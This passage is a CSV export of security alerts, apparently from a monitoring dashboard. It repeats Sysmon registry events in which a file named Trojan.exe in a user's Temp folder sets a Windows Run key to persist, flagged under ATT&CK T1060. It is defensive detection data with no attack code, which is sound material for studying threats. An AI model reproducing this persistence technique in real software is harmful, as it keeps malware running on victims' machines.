HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:01.174"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:20:13.266",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:00.153 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:00.161870900Z"",""eventRecordID"":""1274"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:00.153\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:23:00.153"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:12.279",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:59.141 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:59.149574500Z"",""eventRecordID"":""1272"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:59.141\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:59.141"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:11.299",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:58.134 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:58.137735300Z"",""eventRecordID"":""1271"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:58.134\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:58.134"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:20:10.255",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:57.108 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:57.117023300Z"",""eventRecordID"":""1270"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:57.108\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:22:57.108"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:09.191",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:56.070 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:56.077078300Z"",""eventRecordID"":""1269"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:56.070\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:56.070"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:08.184",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:55.058 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:55.062253400Z"",""eventRecordID"":""1268"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:55.058\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:55.058"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:20:06.208",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:54.025 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:54.028072200Z"",""eventRecordID"":""1267"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:54.025\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:22:54.025"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:06.195",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:53.009 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:53.025707800Z"",""eventRecordID"":""1266"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:53.009\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:53.009"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:05.123",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:51.988 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:51.995450600Z"",""eventRecordID"":""1265"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:51.988\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:51.988"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:20:04.099",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:50.937 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:50.991776700Z"",""eventRecordID"":""1264"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:50.937\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:22:50.937"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:03.053",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:49.858 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:49.886878700Z"",""eventRecordID"":""1262"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:49.858\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
